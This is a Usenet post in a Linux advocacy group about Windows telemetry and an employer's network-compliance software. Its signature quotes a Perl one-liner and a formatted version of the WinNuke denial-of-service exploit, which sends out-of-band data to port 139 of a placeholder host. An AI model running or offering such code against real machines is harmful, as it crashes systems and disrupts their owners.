Deutsch   English   Français   Italiano  
<vievd5$1mmj5$4@dont-email.me>

View for Bookmarking (what is this?)
Look up another Usenet article

Path: ...!eternal-september.org!feeder3.eternal-september.org!news.eternal-september.org!.POSTED!not-for-mail
From: Chris Ahlstrom <OFeem1987@teleworm.us>
Newsgroups: comp.os.linux.advocacy
Subject: Re: Ubuntu
Date: Sat, 30 Nov 2024 07:11:16 -0500
Organization: None
Lines: 42
Message-ID: <vievd5$1mmj5$4@dont-email.me>
References: <lql3clFsia4U1@mid.individual.net>
 <vi4pth$3gius$1@dont-email.me> <qq0ckj9v3n0uo5vs91i9c86b0puhslr7hs@4ax.com>
 <vi57qi$3iv23$1@dont-email.me> <67dckjd1fbbv4aav4kp6842rakbo2h1mag@4ax.com>
 <vi5fct$3kgo3$1@dont-email.me> <2jgckjtaunuajukcoratab544j39o2vsfo@4ax.com>
 <vi7en1$21kk$3@dont-email.me> <brfekjtio2i4v5cnl68lllktjs9qmq6gbj@4ax.com>
 <vi7jij$33ib$4@dont-email.me> <vi7r1s$4mp5$1@dont-email.me>
 <jcuekj9ktbvqclu88gbpkaofjsfi397pp9@4ax.com> <vi85ua$6e2d$6@dont-email.me>
 <6btgkjpp758ab6jnokgj30unev949r819n@4ax.com> <vicuit$169a1$1@dont-email.me>
 <674a46f2$0$12946$426a74cc@news.free.fr>
Reply-To: OFeem1987@teleworm.us
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 30 Nov 2024 13:11:17 +0100 (CET)
Injection-Info: dont-email.me; posting-host="bdafc0c62d7ea124a9a2ff2f7ac5fd4d";
	logging-data="1792613"; mail-complaints-to="abuse@eternal-september.org";	posting-account="U2FsdGVkX1+4UfouFnRivOCMbJkv6q04"
User-Agent: slrn/1.0.3 (Linux)
Cancel-Lock: sha1:XTpqpTC0xVYgq7qnGs0DgNRsKcY=
X-Mutt: The most widely-used MUA
X-Face: 63n<76,LYJQ2m#'5YL#.T95xqyPiG`ffIP70tN+j"(&@6(4l\7uL)2+/-r0)/9SjZ`qw=
 Njn mr93Xrerx}aQG-Ap5IHn"xe;`5:pp"$RH>Kx_ngWw%c\+6qSg!q"41n2[.N/;Pu6q8?+Poz~e
 A9? $6_R7cm.l!s8]yfv7x+-FYQ|/k
X-Slrn: Why use anything else?
X-User-Agent: Microsoft Outl00k, Usenet K00k Editions
Bytes: 3291

Stéphane CARPENTIER wrote this post while blinking in Morse code:

> Le 29-11-2024, DFS <guhnoo-basher@linux.advocaca> a écrit :
>> On 11/28/2024 8:54 AM, shitv wrote:
>>
>>> Those wacky folks at Micro$oft consider spyware to be part of the
>>> operating system.
>>
>> How do you know they're spying on you?
>>
>> What info are they collecting without your knowledge?

Try running Wireshark for awhile.

> Putting spyware doesn't imply that they spy on you. They can give the
> tools to others to spy on you. And the fact is: they do. I know an
> adminsys who told me it's very impressive what an adminsys can know
> about everything done by the users. A manager can ask an adminsys to
> tell him anything someone did with his computer: it comes by default and
> it is really easy to use.

I ran Wireshark at work once to try to figure out the Cisco crapware they used
to verify that the machine was "approved" (they supported Windows and OSX).
I saw it would be impossible to replicate on Linux.

Later, of course, the Company blacklisted Wireshark :-D

And trashed my Linux partition :-D :-D :-D

-- 
Winnuke in one line?  No problem:
perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"bad.dude.com:139")->send("bye",MSG_OOB)'
 
And formatted so it's a little easier to read:
 
        #!/usr/bin/perl
        use IO::Socket;
        IO::Socket::INET
                ->new(PeerAddr=>"bad.dude.com:139")
                ->send("bye", MSG_OOB);
 
		-- Randal Schwartz